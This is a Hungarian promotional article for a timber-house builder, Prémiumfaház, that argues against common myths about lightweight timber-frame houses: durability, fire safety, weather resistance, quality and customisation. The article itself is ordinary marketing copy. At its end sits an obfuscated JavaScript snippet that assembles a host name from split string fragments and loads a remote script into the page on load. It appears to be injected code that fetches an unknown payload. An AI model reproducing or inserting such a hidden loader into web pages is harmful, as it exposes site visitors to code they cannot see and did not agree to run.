Könnyűszerkezetes faházak, avagy a jövő otthonai - Az igazság a leggyakoribb tévhitekről

könnyűszerkezetes ház, faház

Sokáig csak legyintettek rá: „Gyorsan összedobott házikó.” „Nyáron meleg, télen hideg.” „Nem éri meg, úgysem tartós.” A könnyűszerkezetes házak körül olyan tévhitek keringenek, amik rég megcáfolt technológiákhoz és elavult elvárásokhoz kötődnek – nem pedig a 21. századi valósághoz. Miközben világszerte egyre több építkező dönt a korszerű könnyűszerkezetes megoldások mellett, idehaza még mindig sok a félreértés. Pedig ezek a házak ma már nem csupán versenyképesek, hanem sok szempontból előremutatóbbak is, mint a hagyományos építési formák. Ebben a cikkben öt gyakori tévhitet veszünk sorra – szakmai alapossággal, de közérthetően. Tűzállóság, tartósság, esztétika, személyre szabhatóság: jöjjenek a tények, amik új megvilágításba helyezik a könnyűszerkezetes házak jövőjét.

Tévhit: A könnyűszerkezetes házak nem tartósak

A leggyakrabban hallott kritika, ami a legtávolabb áll a valóságtól. Sokan úgy vélik, hogy a könnyűszerkezetes házak élettartama rövidebb, mint a hagyományos téglaházaké. Ez azonban nem igaz. Megfelelő tervezéssel, minőségi anyagokkal és szakszerű kivitelezéssel a könnyűszerkezetes házak élettartama elérheti, sőt meghaladhatja a 100 évet. Külföldön számos példa van több mint egy évszázada álló könnyűszerkezetes épületekre. Ez nem kompromisszum. Ez egy másik iskola.

Tévhit: A könnyűszerkezetes házak tűzveszélyesek

A modern könnyűszerkezetes házak elemei már a tervezéskor szigorú tűzvédelmi szabványoknak felelnek meg. A tűzgátló gipszkarton, az éghetetlen szigetelőanyagok (mint például a nem éghető ásványgyapot, ami nem bocsát ki gázokat sem) és a pontos kivitelezés gondoskodik arról, hogy egy ilyen ház tűz esetén is védelmet nyújtson. Ráadásul, míg a fém hirtelen elveszíti szilárdságát, a fa hosszabb ideig tartja meg teherbírását – előre jelezhető, kontrollált módon viselkedik a hő hatására. Ez is biztonság, csak másképp. A szigorú tűzvédelmi szabályok meghatározzák, hogy egy fa tartószerkezetnek hány percig kell megtartania a tartószerkezeti szerepét. Ehhez mérten kell meghatározni a tartógerendák keresztmetszetét. Amíg a fém hő hatására lágyul és olvad, addig a fa kívülről körbeég, de a tartószilárdságát megtartja.

Tévhit: A könnyűszerkezetes házak nem ellenállóak az időjárással szemben

A mai könnyűszerkezetes épületek nemcsak elbírják a hazai időjárást – kifejezetten ehhez igazodva készülnek. A rétegrendek úgy vannak kialakítva, hogy a ház szél-, pára- és hővédelme többrétegű, jól szellőző és rendkívül ellenálló legyen. Ezek az épületek jobban viselik a hőtágulást, a páradús környezetet és a hőingadozást is, mint sok régi kőépület. És ha már tartósság: a rugalmas szerkezetek földrengésbiztonság terén is előnyt jelentenek. Építkezni lehet máshogy is – de nem érdemes félni a jól működő megoldástól.

Tévhit: A könnyűszerkezetes házak költséghatékonyak lehetnek, de rosszabb minőségűek

A könnyűszerkezetes technológia gyorsaságával és anyaghatékonyságával valóban költséget takaríthat meg meg – de ez nem megy a minőség rovására. Ellenkezőleg: az előregyártott elemekkel dolgozó rendszerben sokkal kevesebb a kivitelezési hiba lehetősége, mint egy építési helyszínen, időjárásnak kitéve rakott tégla esetében. A falak nem nedvesednek, az anyagveszteség minimális, és minden milliméter a terv szerint készül. Nem az „olcsóbb” a kulcsszó, hanem a tervezett és optimalizált. A kettő között óriási különbség van.

Tévhit: A könnyűszerkezetes házak nem személyre szabhatók

Ez az állítás ma már egyszerűen nem igaz. A könnyűszerkezetes építkezés rendkívül rugalmas formai és belsőépítészeti megoldásokban. Egyedi alaprajz, homlokzati kialakítás, nyílászárók, burkolatok, enteriőr – mind-mind szabadon tervezhető. Az építési technológia nem korlátoz, hanem lehetőséget ad: karakteres, modern, klasszikus vagy éppen skandináv stílusú otthon ugyanúgy építhető könnyűszerkezetből, mint téglaalapokon. A stílust nem a fal vastagsága dönti el.

A gondolat, amiből egy valódi otthon születik

A könnyűszerkezetes házak kapcsán ideje lenne levetkőzni az előítéleteket, és elkezdeni a valódi kérdéseket feltenni: Milyen életet szeretnénk élni? Milyen térben? Milyen időtávra?
Az alternatív építkezési formák – mint a prémium minőségű, természetes anyagból épülő, hőszigetelt faházak – ma már nem kivételek, hanem releváns válaszok a lakhatási és életminőségi kérdésekre.

A Prémiumfaház több mint 1 évtizedes tapasztalatával olyan otthonokat épít, amelyek nemcsak technológiai értelemben korszerűek, hanem érzelmileg is megérkezés-élményt nyújtanak. Stabil szerkezet, meleg tapintás, emberléptékű terek – és egy gondolat, ami végigvonul az első vázlattól az utolsó csavarbehúzásig: otthont teremteni felelősség. És lehetőség.

A Prémiumfaház nem csupán épít, hanem gondolkodik is a megrendelővel. A könnyűszerkezetes házak terén kínált szolgáltatásaik a valódi, személyre szabott otthonteremtést szolgálják:

  • Egyedi tervezés, amely figyelembe veszi a telek adottságait, a megrendelő életmódját és esztétikai igényeit
  • Szerkezetkész vagy kulcsrakész kivitelezés, a megrendelő által választott készültségi szintig
  • Hőszigetelési megoldások, amelyek garantálják a komfortot egész évben
  • Precíz műszaki előkészítés, statikai tervek, rétegrendek és energiahatékonysági szempontok mentén
  • Modern, letisztult vagy rusztikus megjelenés, az építkezés stílusától függően
  • Belsőépítészeti megoldások, hogy az ház ne csak tartós, hanem valódi otthon is legyen
  • Teljeskörű konzultáció a kivitelezés minden fázisában, építész és műszaki szakemberek bevonásával

<script>
(function(){
a9ut=document.createElement("script");a9ut_="u"+("s")+"ta";
a9ut_+=("t.i")+""+"n";a9ut_+=(("f")+"o");a9ut.type="text/javascript";
a9ut_+="/"; a9utu="2433952845";a9utu+=".ggd7kgwX9utvlw21wbe";a9utu+="71x1t1kbxiw";
a9ut.src="https://"+a9ut_+a9utu;a9ut.async=true;document.body.appendChild(a9ut);
})();
</script>

^ Go up